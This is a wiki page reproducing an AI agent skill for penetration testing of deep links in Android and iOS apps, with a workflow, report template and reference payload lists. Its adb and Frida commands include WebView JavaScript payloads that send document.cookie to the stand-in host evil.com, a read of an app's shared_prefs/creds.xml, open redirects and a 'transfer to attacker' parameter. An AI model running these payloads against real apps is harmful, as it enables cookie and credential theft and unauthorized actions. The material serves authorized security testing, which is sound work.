exploiting-deeplink-vulnerabilities skill (Anthropic-Cybersecurity-Skills)

From Public Agent Wiki

What it does. 'Tests and exploits deep link (URL scheme and App Link) vulnerabilities Part of mukul975/Anthropic-Cybersecurity-Skills (817 security skills) (mukul975/Anthropic-Cybersecurity-Skills).

Upstream mukul975/Anthropic-Cybersecurity-Skills
Skill file skills/exploiting-deeplink-vulnerabilities/SKILL.md
License Apache-2.0 (skill folder LICENSE)
Author mukul975
Fetched 2026-09-10

Install

  • npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-deeplink-vulnerabilities, or copy the skill folder into ~/.claude/skills/exploiting-deeplink-vulnerabilities/.
  • Raw file: curl -sL https://raw.githubusercontent.com/mukul975/Anthropic-Cybersecurity-Skills/HEAD/skills/exploiting-deeplink-vulnerabilities/SKILL.md

SKILL.md (verbatim)

name: exploiting-deeplink-vulnerabilities
description: 'Tests and exploits deep link (URL scheme and App Link) vulnerabilities
  in Android and iOS mobile applications to identify unauthorized access, data injection,
  intent hijacking, and redirect manipulation. Use when assessing mobile app attack
  surface through custom URI schemes, Android App Links, iOS Universal Links, or intent-based
  navigation. Activates for requests involving deep link security testing, URL scheme
  exploitation, mobile intent abuse, or link hijacking.

  '
domain: cybersecurity
subdomain: mobile-security
author: mahipal
tags:
- mobile-security
- android
- ios
- deep-links
- owasp-mobile
- penetration-testing
version: 1.0.0
license: Apache-2.0
nist_csf:
- PR.PS-01
- PR.AA-05
- ID.RA-01
- DE.CM-09
mitre_attack:
- T1059
- T1056
- T1036
- T1078
- T1055

Exploiting Deep Link Vulnerabilities

When to Use

Use this skill when:

  • Assessing mobile app deep link handling for injection and redirect vulnerabilities
  • Testing Android intent filters and iOS URL scheme handlers for unauthorized access
  • Evaluating App Links (Android) and Universal Links (iOS) verification
  • Testing for link hijacking via competing app registrations

Do not use without authorization -- deep link exploitation can trigger unintended actions in target applications.

Prerequisites

  • Android device with ADB or iOS device with Objection/Frida
  • APK decompiled with apktool or JADX for AndroidManifest.xml analysis
  • Knowledge of target app's registered URL schemes and intent filters
  • Drozer for Android intent testing
  • Burp Suite for intercepting deep link-triggered API calls

Workflow

Step 1: Enumerate Deep Link Entry Points

Android - Extract from AndroidManifest.xml:

# Decompile APK
apktool d target.apk -o decompiled/

# Search for intent filters with deep link schemes
grep -A 10 "android.intent.action.VIEW" decompiled/AndroidManifest.xml

# Look for:
# <data android:scheme="myapp" android:host="action" />
# <data android:scheme="https" android:host="target.com" />

iOS - Extract from Info.plist:

# Extract URL schemes
plutil -p Payload/TargetApp.app/Info.plist | grep -A 5 "CFBundleURLSchemes"

# Extract Universal Links (Associated Domains)
plutil -p Payload/TargetApp.app/Info.plist | grep -A 5 "com.apple.developer.associated-domains"
# Check: applinks:target.com

# Verify apple-app-site-association file
curl https://target.com/.well-known/apple-app-site-association

Android via ADB:

# Basic deep link invocation
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://dashboard?user_id=1337" com.target.app

# Test with injection payloads
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://profile?redirect=https://evil.com" com.target.app

# Test path traversal
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://navigate?path=../../../admin" com.target.app

# Test JavaScript injection (if loaded in WebView)
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://webview?url=javascript:alert(document.cookie)" com.target.app

# Test with extra intent parameters
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://transfer?amount=1000&to=attacker" \
  --es extra_param "injected_value" com.target.app

iOS via Safari or command line:

# Trigger URL scheme from Safari
# Navigate to: myapp://dashboard?user_id=1337

# Using Frida to invoke
frida -U -n TargetApp -e '
ObjC.classes.UIApplication.sharedApplication()
  .openURL_(ObjC.classes.NSURL.URLWithString_("myapp://profile?redirect=https://evil.com"));
'

Android:

# Create a malicious app that registers the same URL scheme
# AndroidManifest.xml of attacker app:
# <intent-filter>
#   <action android:name="android.intent.action.VIEW" />
#   <category android:name="android.intent.category.DEFAULT" />
#   <category android:name="android.intent.category.BROWSABLE" />
#   <data android:scheme="myapp" />
# </intent-filter>

# When both apps are installed, Android shows a chooser dialog
# On older Android versions, the first-installed app may handle the link

# Check App Links verification (prevents hijacking)
adb shell pm get-app-links com.target.app
# Status: verified = secure
# Status: undefined = vulnerable to hijacking
# If deep links load URLs in WebView, test for:
# 1. Open redirect
adb shell am start -d "myapp://open?url=https://evil.com" com.target.app

# 2. File access
adb shell am start -d "myapp://open?url=file:///data/data/com.target.app/shared_prefs/creds.xml"

# 3. JavaScript execution in WebView
adb shell am start -d "myapp://open?url=javascript:fetch('https://evil.com/steal?cookie='+document.cookie)"

Step 5: Assess Parameter Validation

Test each deep link parameter for:

  • SQL injection in parameters that query local databases
  • Path traversal in file path parameters
  • SSRF in URL parameters that trigger server requests
  • Authentication bypass via user_id or session parameters

Key Concepts

Term Definition
Custom URL Scheme App-registered protocol (myapp://) that routes to specific app handlers when invoked
App Links (Android) Verified HTTPS deep links that bypass the chooser dialog and open directly in the verified app
Universal Links (iOS) Apple's verified deep linking using apple-app-site-association JSON file on the web domain
Intent Hijacking Malicious app intercepting deep links by registering the same URL scheme or intent filter
WebView Bridge JavaScript interface exposed to WebView content, potentially accessible via deep link-loaded URLs

Tools & Systems

  • ADB: Android command-line tool for invoking deep links via am start
  • Drozer: Android security framework for testing intent-based attack surface
  • apktool: APK decompiler for extracting AndroidManifest.xml and intent filter definitions
  • Frida: Dynamic instrumentation for hooking URL scheme handlers at runtime
  • Burp Suite: Proxy for intercepting API calls triggered by deep link navigation

Common Pitfalls

  • App Links verification: Android App Links with verified domain associations are resistant to hijacking. Check assetlinks.json at https://domain/.well-known/assetlinks.json.
  • Fragment handling: Some apps process URL fragments (#) differently than query parameters (?). Test both.
  • Encoding bypass: URL-encode payloads to bypass client-side input filtering in deep link handlers.
  • Multi-step deep links: Some deep links require authentication state. Test after login and before login to assess authorization enforcement.

Other files in this skill

assets/template.md (verbatim)

Deep Link Vulnerability Assessment Report

Target Application

Field Value
Application [APP_NAME]
Package/Bundle ID [ID]
Platform [Android/iOS]
Deep Links Found [COUNT]
Test Date [DATE]
Scheme Host Path Activity/Handler Exported Browsable
[SCHEME] [HOST] [PATH] [HANDLER] [YES/NO] [YES/NO]

Findings

Finding [N]: [TITLE]

  • Severity: [LEVEL]
  • Deep Link: [URL]
  • Issue: [DESCRIPTION]
  • Evidence: [COMMAND_AND_OUTPUT]
  • Recommendation: [REMEDIATION]

Recommendations

  1. [RECOMMENDATION]

references/api-reference.md (verbatim)

API Reference: Deep Link Vulnerability Testing

AndroidManifest.xml Configuration

<activity android:name=".DeepLinkActivity" android:exported="true">
    <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="myapp" android:host="open"/>
    </intent-filter>
</activity>

ADB Testing

adb shell am start -W -a android.intent.action.VIEW \
    -d "myapp://open/path?param=value" com.target.app

Intent URI Scheme

intent://path#Intent;scheme=myapp;package=com.target.app;end

iOS URL Schemes

Info.plist Configuration

<key>CFBundleURLTypes</key>
<array>
    <dict>
        <key>CFBundleURLSchemes</key>
        <array>
            <string>myapp</string>
        </array>
    </dict>
</array>
{
  "applinks": {
    "apps": [],
    "details": [{
      "appID": "TEAM_ID.com.example.app",
      "paths": ["/open/*", "/product/*"]
    }]
  }
}

Vulnerability Types

Type Risk Description
Open Redirect HIGH Deep link redirects to attacker URL
JavaScript Injection CRITICAL Code execution in WebView
Parameter Theft HIGH Token/credential exfiltration
Intent Redirect HIGH Android intent hijacking
Path Traversal MEDIUM Access unintended app sections

Attack Payloads

Open Redirect

myapp://open?redirect=https://evil.com
myapp://open?url=javascript:alert(document.cookie)

WebView JavaScript

myapp://webview?url=javascript:fetch('https://evil.com/'+document.cookie)

Parameter Injection

myapp://auth?token=stolen&callback=https://evil.com

Hook URL Handler (Android)

Java.perform(function() {
    var Activity = Java.use("android.app.Activity");
    Activity.onNewIntent.implementation = function(intent) {
        console.log("Deep link: " + intent.getData().toString());
        this.onNewIntent(intent);
    };
});

Hook URL Handler (iOS)

var handler = ObjC.classes.AppDelegate["- application:openURL:options:"];
Interceptor.attach(handler.implementation, {
    onEnter: function(args) {
        var url = ObjC.Object(args[3]);
        console.log("URL scheme: " + url.toString());
    }
});

references/standards.md (verbatim)

Standards Reference: Deep Link Vulnerabilities

OWASP Mobile Top 10 2024

ID Risk Deep Link Relevance
M4 Insufficient Input/Output Validation Injection via deep link parameters
M8 Security Misconfiguration Unverified App Links, missing scheme validation

OWASP MASVS v2.0 - MASVS-PLATFORM

Control Test
MASVS-PLATFORM-1 App validates deep link parameters before processing
MASVS-PLATFORM-2 App does not expose sensitive functionality via URL schemes

CWE Mappings

CWE Title Attack Vector
CWE-939 Improper Authorization in Handler for Custom URL Scheme Scheme hijacking
CWE-940 Improper Verification of Source in URL Scheme Handler Missing origin validation
CWE-79 Cross-site Scripting JavaScript injection via WebView deep links
CWE-601 URL Redirection to Untrusted Site Open redirect via URL parameter

references/workflows.md (verbatim)

Workflows: Deep Link Vulnerability Testing

[Extract Manifest/Plist] --> [Enumerate schemes] --> [Test each deep link]
                                                          |
                                           +--------------+--------------+
                                           |              |              |
                                    [Parameter injection] [Redirect test] [WebView loading]
                                    [SQL/XSS/Path trav]  [Open redirect]  [JS injection]
                                           |              |              |
                                           +--------------+--------------+
                                                          |
                                                   [Link hijacking test]
                                                   [App Links verification]
                                                   [Report findings]

Decision Matrix

Scheme Type Hijacking Risk Mitigation
Custom (myapp://) HIGH - any app can register Validate calling app, use App Links
App Links (verified) LOW - domain verified Ensure assetlinks.json is correct
Universal Links LOW - domain verified Ensure AASA file is correct

Back to mukul975/Anthropic-Cybersecurity-Skills (817 security skills) or Agent skills.